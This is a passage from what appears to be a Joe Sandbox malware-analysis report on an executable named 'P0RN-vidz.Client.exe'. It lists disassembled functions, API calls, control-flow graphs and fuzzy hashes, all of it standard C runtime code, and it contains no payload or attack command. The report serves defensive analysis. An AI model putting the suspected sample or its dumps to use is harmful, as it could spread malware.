                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376423
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0037642E
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376439
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376444
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                          • Instruction ID: 4381f92f3c55da6b8828375e56140d47245b7498ede9e8cbe16eab185bbd9cc4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D111F75580B04AAE532B7B0CC27FCB7BDC9F06700F848819B79E6E162DB69B504CA50
                                                                                                                                                                                                                                          Function 00372521 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 342 372521-372528 343 37252d-372548 GetLastError call 3727f4 342->343 344 37252a-37252c 342->344 347 372561-372563 343->347 348 37254a-37254c 343->348 349 3725a7-3725b2 SetLastError 347->349 348->349 350 37254e-37255f call 37282f 348->350 350->347 353 372565-372575 call 3740b7 350->353 356 372577-372587 call 37282f 353->356 357 372589-372599 call 37282f 353->357 356->357 362 37259b-37259d 356->362 363 37259f-3725a6 call 374015 357->363 362->363 363->349
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00372518,003721EF,00371AFD), ref: 0037252F
                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0037253D
                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00372556
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00372518,003721EF,00371AFD), ref: 003725A8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                          • Opcode ID: b7f724b280d5f22eeda253b5ad4e180c3e2cf38a6d0bcaf182faee4a381a1a41
                                                                                                                                                                                                                                          • Instruction ID: 6b85b36e1efc456d64e596bf8dca556b4b8ec76325efc3e6ce233d6750370656
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7f724b280d5f22eeda253b5ad4e180c3e2cf38a6d0bcaf182faee4a381a1a41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 740120721193156EE7372774BC9662BA79CDB16774F318339F52C491E4EF1A4C419340
                                                                                                                                                                                                                                          Function 00374574 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 366 374574-374588 GetLastError 367 374596-37459b 366->367 368 37458a-374594 call 375a54 366->368 370 37459d call 37495c 367->370 368->367 373 3745df-3745ea SetLastError 368->373 372 3745a2-3745a8 370->372 374 3745b3-3745c1 call 375aaa 372->374 375 3745aa 372->375 381 3745c6-3745dd call 3743e6 call 3749b9 374->381 382 3745c3-3745c4 374->382 376 3745ab-3745b1 call 3749b9 375->376 384 3745eb-3745f7 SetLastError call 374074 376->384 381->373 381->384 382->376
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?,00376EB9,?,?,?,003804D8,0000002C,00374084,00000016,003721EF,00371AFD), ref: 00374578
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003745AB
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003745D3
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 003745E0
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 003745EC
                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 003745F2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                                                                          • Opcode ID: 8bb14c86b88ce71bf2ba204f3a718884244105901133f1a7bc322814021b6d13
                                                                                                                                                                                                                                          • Instruction ID: be9a8d6cb0715f13e64c5888dc60fae937362a2e8987a60e37696a6dd7b1375e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bb14c86b88ce71bf2ba204f3a718884244105901133f1a7bc322814021b6d13
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F0FC365006006BC63377346C59F2B26AD9FC3771F32C214FA2CDA195EF6CAA418660
                                                                                                                                                                                                                                          Function 0037384C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 390 37384c-373874 GetModuleHandleExW 391 373876-373889 GetProcAddress 390->391 392 373899-37389d 390->392 393 37388b-373896 391->393 394 373898 391->394 395 37389f-3738a2 FreeLibrary 392->395 396 3738a8-3738b5 call 37123a 392->396 393->394 394->392 395->396
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003737FD,?,?,0037379D,?,003802F0,0000000C,003738F4,?,00000002), ref: 0037386C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0037387F
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,003737FD,?,?,0037379D,?,003802F0,0000000C,003738F4,?,00000002,00000000), ref: 003738A2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 7d4464c9b37c60669ca91ee288abbe79a34b87c1cafac7e3bacfeec6877cd489
                                                                                                                                                                                                                                          • Instruction ID: 2f7de7f35fc77cadb406cf0ba68d3863ba0bb9bda711ebb32d3fd249aab2bb85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d4464c9b37c60669ca91ee288abbe79a34b87c1cafac7e3bacfeec6877cd489
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFF04F31A00208BBCB339F94DC49BEEFFB8EF08752F0180A4F80DA6150DB344A85DA91
                                                                                                                                                                                                                                          Function 0037649D Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 400 37649d-3764c2 call 3740c2 403 3764c4-3764cc 400->403 404 3764cf-3764f5 MultiByteToWideChar 400->404 403->404 405 376594-376598 404->405 406 3764fb-376507 404->406 409 3765a4-3765b9 call 37123a 405->409 410 37659a-37659d 405->410 407 376553 406->407 408 376509-37651a 406->408 411 376555-376557 407->411 412 376535-37653b 408->412 413 37651c-37652b call 37ad70 408->413 410->409 415 37658d-376593 call 3765ba 411->415 416 376559-37657b call 372200 MultiByteToWideChar 411->416 418 37653c call 37644f 412->418 413->415 426 37652d-376533 413->426 415->405 416->415 428 37657d-37658b GetStringTypeW 416->428 423 376541-376546 418->423 423->415 427 376548 423->427 429 37654e-376551 426->429 427->429 428->415 429->411
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00375618,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 003764EA
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00376522
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00376573
                                                                                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00376585
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0037658E
                                                                                                                                                                                                                                            • Part of subcall function 0037644F: HeapAlloc.KERNEL32(00000000,?,00000004,?,00377FAB,?,00000000,?,003769BF,?,00000004,00000000,?,?,?,00373D1D), ref: 00376481
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1857427562-0
                                                                                                                                                                                                                                          • Opcode ID: de67ebb2d28a005ed439fcebe759957d655142d56cc1b9095d3f0beb31b4c692
                                                                                                                                                                                                                                          • Instruction ID: 70951a6c9b9ba144393bfa64eb2e8cd35df8496a7b86f1ee2b1f55b8859342e6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de67ebb2d28a005ed439fcebe759957d655142d56cc1b9095d3f0beb31b4c692
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9531D272A0060A9BDF369F65CC66DAF7BA5EF45320F058228FC18DA150E739CD50DB90
                                                                                                                                                                                                                                          Function 0037576E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 430 37576e-375783 GetEnvironmentStringsW 431 375785-3757a5 call 375737 WideCharToMultiByte 430->431 432 3757db 430->432 431->432 438 3757a7 431->438 433 3757dd-3757df 432->433 435 3757e1-3757e2 FreeEnvironmentStringsW 433->435 436 3757e8-3757f0 433->436 435->436 439 3757a8 call 37644f 438->439 440 3757ad-3757b2 439->440 441 3757b4-3757c8 WideCharToMultiByte 440->441 442 3757d0 440->442 441->442 443 3757ca-3757ce 441->443 444 3757d2-3757d9 call 3749b9 442->444 443->444 444->433
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00375777
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0037579A
                                                                                                                                                                                                                                            • Part of subcall function 0037644F: HeapAlloc.KERNEL32(00000000,?,00000004,?,00377FAB,?,00000000,?,003769BF,?,00000004,00000000,?,?,?,00373D1D), ref: 00376481
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003757C0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003757D3
                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003757E2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2278895681-0
                                                                                                                                                                                                                                          • Opcode ID: c2e838b557875aaf3a78bfc4d7580a6474f21272776f0472c6507e63548e77d2
                                                                                                                                                                                                                                          • Instruction ID: 8e5b06b06d56cbfa5fda0523aee2ffdb2808ceb950a255b063c095648f576932
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2e838b557875aaf3a78bfc4d7580a6474f21272776f0472c6507e63548e77d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0001F772601B99BFA33B16765C8DD7BAABDDEC2B617254129FD0CD7500EBA88C0185B0
                                                                                                                                                                                                                                          Function 003745F8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 447 3745f8-37460f GetLastError 448 374611-37461b call 375a54 447->448 449 37461d-374622 447->449 448->449 454 37466e-374675 SetLastError 448->454 450 374624 call 37495c 449->450 453 374629-37462f 450->453 455 374631 453->455 456 37463a-374648 call 375aaa 453->456 457 374677-37467c 454->457 458 374632-374638 call 3749b9 455->458 463 37464d-374663 call 3743e6 call 3749b9 456->463 464 37464a-37464b 456->464 465 374665-37466c SetLastError 458->465 463->454 463->465 464->458 465->457
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0037494E,00377FC9,?,003769BF,?,00000004,00000000,?,?,?,00373D1D,?,00000000), ref: 003745FD
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00374632
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00374659
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00374666
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0037466F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                          • Opcode ID: 074546c45af86ce5cc8ca00f5af69adc541aaca917970f03e5a630de53dca7a8
                                                                                                                                                                                                                                          • Instruction ID: 1f8e2f3f410d986509aaf50d07068d308463a51729cd357c676c6535a7ec6fdc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 074546c45af86ce5cc8ca00f5af69adc541aaca917970f03e5a630de53dca7a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6601C836100640ABC63377356C85F2B266EABD7375B32C128FA2DD6192FF7DAC019165
                                                                                                                                                                                                                                          Function 003762C6 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 470 3762c6-3762d1 471 3762d3-3762db 470->471 472 37632c-37632e 470->472 473 3762e4-3762ed 471->473 474 3762dd-3762e3 call 3749b9 471->474 475 3762f6-3762ff 473->475 476 3762ef-3762f5 call 3749b9 473->476 474->473 480 376301-376307 call 3749b9 475->480 481 376308-376311 475->481 476->475 480->481 484 376313-376319 call 3749b9 481->484 485 37631a-376323 481->485 484->485 485->472 488 376325-37632b call 3749b9 485->488 488->472
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003762DE
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003762F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376302
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376314
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00376326
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: 13fbb6ab79447b5b3f67257355f08a91dbb96b4b8ac2a292fe10cc04aa017eed
                                                                                                                                                                                                                                          • Instruction ID: d45ae24a99f1229949010a6fe0b9269018f4881040fd7a863a13b57423f0d62c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13fbb6ab79447b5b3f67257355f08a91dbb96b4b8ac2a292fe10cc04aa017eed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9F04F32524A00ABC672EB64F592C1B77DDAA023107598845FA8DDB611CB38FC80CE54
                                                                                                                                                                                                                                          Function 00373EDF Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373EFD
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: HeapFree.KERNEL32(00000000,00000000,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?), ref: 003749CF
                                                                                                                                                                                                                                            • Part of subcall function 003749B9: GetLastError.KERNEL32(?,?,0037635D,?,00000000,?,00000000,?,00376384,?,00000007,?,?,003767EF,?,?), ref: 003749E1
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373F0F
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373F22
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373F33
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00373F44
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: 811eaa9f21495f286822b26e5c7efc5acdafd83058a3000ccfab54b6c3b1b6fc
                                                                                                                                                                                                                                          • Instruction ID: f14bb77a3eaf2c99b5c9c8cd075211620457b195f1c00dbf37addabf9da3cbd7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 811eaa9f21495f286822b26e5c7efc5acdafd83058a3000ccfab54b6c3b1b6fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0DA788103209FD7236F18BC4555B3BACAB07720B664286FA1A5A271D7395942DFC1
                                                                                                                                                                                                                                          Function 003730A3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\P0RN-vidz.Client.exe,00000104), ref: 003730E3
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003731AE
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 003731B8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2372112538.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372081217.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372147872.000000000037B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372177922.0000000000381000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2372207329.0000000000383000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_370000_P0RN-vidz.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\P0RN-vidz.Client.exe
                                                                                                                                                                                                                                          • API String ID: 2506810119-1362196275
                                                                                                                                                                                                                                          • Opcode ID: 5d28735f68ad51fa168facebdc9cd1b0749d2b996ccd3b9d9c942977b9fcf192
                                                                                                                                                                                                                                          • Instruction ID: 1592dac1d9207614b1e8e7c93ee28405b216b6059d9db5abf481aa1d2afcbdd2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d28735f68ad51fa168facebdc9cd1b0749d2b996ccd3b9d9c942977b9fcf192
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6318375A00248AFDB33EB99DC819AEBBFCEB85310F108096F5089B211D7745B45EB51
                                                                                                                                                                                                                                          Function 00372733 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,003726E4,00000000,?,00381B54,?,?,?,00372887,00000004,InitializeCriticalSectionEx,0037BC48,InitializeCriticalSectionEx), ref: 00372740
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,003726E4,00000000,?,00381B54,?,?,?,00372887,00000004,InitializeCriticalSectionEx,0037BC48,InitializeCriticalSectionEx,00000000,?,00372617), ref: 0037274A
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00372772
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
